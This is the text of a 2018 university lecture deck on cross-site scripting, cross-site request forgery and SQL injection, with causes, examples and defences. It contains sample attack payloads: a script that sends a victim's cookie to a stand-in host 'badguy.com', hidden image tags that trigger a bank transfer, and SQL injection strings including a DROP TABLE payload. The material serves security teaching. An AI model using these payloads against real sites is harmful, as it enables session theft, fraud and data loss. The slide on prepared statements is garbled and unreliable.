CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides
Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server system Inject content on web pages that trick users or Inject content on web pages that trick web servers Result is stolen resources or destruction of information 2
Web Based Attacks 3
Application Layer APPLICATION ATTACK Finance Accounts Transactions Administration E-Commerce Knowledge Mgmt Communication Custom Code Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing Application Layer Attacker sends attacks inside valid HTTP requests Your code is tricked into doing something it should not Security requires software development expertise App Server Web Server Network Layer Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests Network Layer Firewall Hardened OS Firewall Insider 4
Types of Web Attacks What kinds of Web attacks are popular? Inadequate validation of user input Named Attacks Below Cross site scripting, XSS Cross site request forgery, CSRF SQL Injection 5
Cross-site Scripting (XSS) Cross-site scripting (XSS) computer security vulnerability found in web applications Allows code injection by malicious web users into web pages viewed by other users Examples of such code include HTML code and clientside scripts An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as Same origin policy for scripts As of 2017 cross-site scripting among the top 10 web site problems https://www.owasp.org/index.php/category:owasp_top_ten_2017_project 6
Same Origin Policy Intent is to let users visit untrusted web sites without those web sites interfering with user's session with honest web sites Same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin Two pages have same origin if protocol, port (if one is specified), and host are the same for both pages http://www.w3.org/security/wiki/same_origin_policy URL Outcome Reason http://store.company.com/dir2/other.html Success http://store.company.com/dir/inner/another.html Success https://store.company.com/secure.html Failure Different protocol http://store.company.com:81/dir/etc.html Failure Different port http://news.company.com/dir/other.html Failure Different host 7
Example Websites XSS d A hacker was able to insert JavaScript code into the Obama community blog section JavaScript would redirect users to Hillary Clinton website http://www.youtube.com/watch?v=pas7kcgjkew http://www.crn.com/news/security/207401353/ obama-website-hacked-users-redirected-to-clinton-campaign.htm Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs List of websites XSS are here http://www.xssed.com/archive Example of XSS Attack http://www.acunetix.com/websitesecurity/xss/ 8
Cross Site Scripting (XSS) Recall Scripts embedded in web pages run in browsers Scripts can access cookies Get private information Manipulate page objects Controls what users see Scripts controlled by same-origin policy How could XSS occur? Web applications often take user inputs and use them as part of webpage 9 9
Cross-Site Scripting (XSS) Attacks
XSS Example User input is echoed into HTML response Example: Search field http://victim.com/search.php? term = apple search.php responds with this page: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> Is this exploitable? 11
XSS Example Attacker s Bad input Problem: No validation of input term Consider this link: http://victim.com/search.php? term = <script> window.open( http://badguy.com?cookie = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> Browser executes script: Sends badguy.com cookie for victim.com 12
More Details of XSS Why would user click on such a link? Phishing email in webmail client (e.g. gmail). Link in doubleclick banner ad many, many ways to fool user into clicking What if badguy.com gets cookie for victim.com? Cookie can include session authentication for victim.com Or other data intended only for victim.com Violates same origin policy Lets see another picture of this more details https://excess-xss.com/ 13
Consequences of XSS Attacks XSS can cause problems for end user that range in from annoyance to complete account compromise. Most severe XSS attacks involve disclosure of the user s session cookie, allowing an attacker to hijack the user s session and take over the account. Other results include disclosure of end user files, installation of Trojan horse programs, redirect user to some other page or site, or modify presentation of content 14
XSS Examples More examples for your viewing pleasure Good link below with many cut and paste opportunities to try this out A complete How to for XSS: https://www.owasp.org/index.php/cross-site_scripting_%28xss%29 15
Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities <script> becomes <script> but still displayed as <script> Methods: OWASP ESAPI Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/ XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 16
Preventing XSS Security Expert Coding Recommendations http://www.jtmelton.com/tag/cross-site-scripting/.net: use the Microsoft Anti-XSS Library http://msdn.microsoft.com/en-us/security/aa973814.aspx 17
XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default Will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust Must first enable Javascript in Firefox http://noscript.net/features 18
Cross Site Request Forgery CSRF 19
What is Cross Site Request Forgery? Define it Cross-Site Request Forgery (CSRF) is an attack that tricks victim into loading a page that contains a malicious request It is malicious in that it inherits identity and privileges of victim to perform an undesired function on victim's behalf Change victim's e-mail address, Change home address, or Change password, or purchase something 20
1 Attacker sets the trap on some website on the Internet (or simply via an e-mail) Application with CSRF vulnerability Hidden <img> tag contains attack against vulnerable site Accounts Finance Administration Transactions E-Commerce Knowledge Mgmt Communication Bus. Functions 2 While logged into vulnerable site,victim views attacker site <img> tag loaded by browser sends GET request (including credentials) to vulnerable site 3 Vulnerable site sees legitimate request from victim and performs the action requested 21 Custom Code
Cross Site Request Forgery (CSRF) Cross Site Request Forgery, also XSRF or Cross Site Reference Forgery Works by exploiting trust of site for user In the case of XSS, the user is victim In the case of CSRF, the user is an accomplice Example: http://site/stocks?buy=100&stock=ebay Allows specific actions to be performed when requested If a user is logged into site and an attacker tricks their browser into making a request to one of these task urls, then task is performed for logged in user but the user didn t intend to do it 22
Dangers of CSRF Most of the functionality allowed by website can be performed by an attacker utilizing CSRF What does this mean for victims? This could include Posting content to a message board, Subscribing to an online newsletter, Performing stock trades, using a shopping cart, or Even sending an e-card 23
CSRF More Details Most popular ways to execute CSRF attacks Using HTML image tag, or JavaScript image object An attacker will embed these into an email or website so when user loads page or email, they perform a web request to any URL of attackers liking Examples follow 24
CSRF Code Examples HTML Methods IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> JavaScript Methods 'Image' Object <script> var foo = new Image(); foo.src = "http://host/?command"; </script> 25
CSRF Example Detailed Say, online banking site performs a transfer of funds action by calling a URL such as: http://bigsafebank.com/ transfer.do?acct=attacker&amount=1000 This URL will transfer $1000 from a victim s account into the attacker s account if the victim is logged into their account within BigSafeBank website 26
CSRF Example Detailed Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML email with a tag such as: <img src="http://bigsafebank.com/transfer.do? acct=attacker&amount=1000" width="1" height="1" border="0"> When a victim views this HTML email, Will see an error indicating that image could not be loaded, But browser still submits transfer request to bigsafebank.com without requiring any further interaction from the user 27
CSRF Example Detailed Crazy part is Even though the image was rendered unsuccessfully, Using <img> tag, an automatic http request was made that contained the victim's credentials, ie. Session Cookie Allowing server to perform the malicious action 28
CSRF Why Does it Happen A web application's vulnerability to CSRF is due to the following conditions: Use of certain HTML tags will result in automatic HTTP Request execution Our browsers have no way of telling if a resource referenced by an <img> tag is a legitimate image Loading of an image will happen regardless of where that image is located 29
CSRF Why Does it Happen More reasons why... Code within web application performs security sensitive operations in response to requests without validation of user GET requests are especially vulnerable to this type of attack, but POST requests are not immune 30
Fixing CSRF with CSRF Guard http://www.owasp.org/index.php/how_csrfguard_works The Open Web Application Security Project (OWASP) Has tool, CSRF Guard, implements session-token to thwart CSRF attacks When user first visits site, application will generate and store a session specific token This session specific token is then placed in each form and link of HTML response, ensuring that this value will be submitted with next request For each subsequent request, application must verify existence of unique token parameter and compare its value to that of value stored in user's session 31
SQL Injection 32
SQL Injection Very Common vulnerability (~71 attacks/hour ) Exploits Web Databases Poorly validate user input for SQL string literal escape characters, e.g., ' Do not have strongly screened user input Example escape characters "SELECT * FROM users WHERE name = '" + username + "';" If username is set to ' or '1'='1, the resulting SQL is SELECT * FROM users WHERE name = '' OR '1'='1'; This evaluates to SELECT * FROM users displays all users 33
SQL Injection Example Select statement "SELECT * FROM userinfo WHERE id = " + a_variable + ";" If programmer doesn t check a_variable is a number, attacker can set a_variable = 1; DROP TABLE users SQL evaluates to SELECT * FROM userinfo WHERE id=1;drop TABLE users; Result of this query? Users table is deleted 34
Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS 35
Preventing SQL injection Use Prepared Statements $id=1234 select * from accounts where id = + $id Next one is safer More exact select * from accounts where id =1234 Validate input Strong typing If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters ticks, --, semi-colon, brackets OWASP Cheat sheet https://www.owasp.org/index.php/sql_injection_prevention_cheat_sheet 36
Summary Experts suggest, Internet Security model is completely flawed Made worse by Web 2.0 As developers we can at least ensure our code is not broken As users we have far less control Browser security!!!! 37
References CSRF Links CGI FAQ on Cross Site Request Forgery (CSRF) http://www.cgisecurity.com/articles/csrf-faq.shtml Art of Software Security Assessment Same Origin http://taossa.com/index.php/2007/02/08/same-origin-policy/ OWASP CSRF Site http://www.owasp.org/index.php/csrf MSDN Article on CSRF Explained http://msdn.microsoft.com/en-us/testing/cc664492.aspx Wikipedia http://en.wikipedia.org/wiki/crosssite_request_forgery 38
References XSS http://www.cgisecurity.com/articles/xss-faq.shtml http://sandsprite.com/sleuth/papers/realworld_xss_1.html http://www.cgisecurity.com/articles/xss-faq.shtml http://msdn.microsoft.com/en-us/testing/cc664492.aspx http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ 39
References SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ SQL Prevention http://www.marcofolio.net/features/how_you_can_prevent_an_sql_inj ection.html SQL Attacks from UnixWiz http://www.unixwiz.net/techtips/sql-injection.html OWASP SQL Injection https://www.owasp.org/index.php/sql_injection_prevention_cheat_ Sheet 40
End Lab this week, XSS and CSRF and SQL Injection 41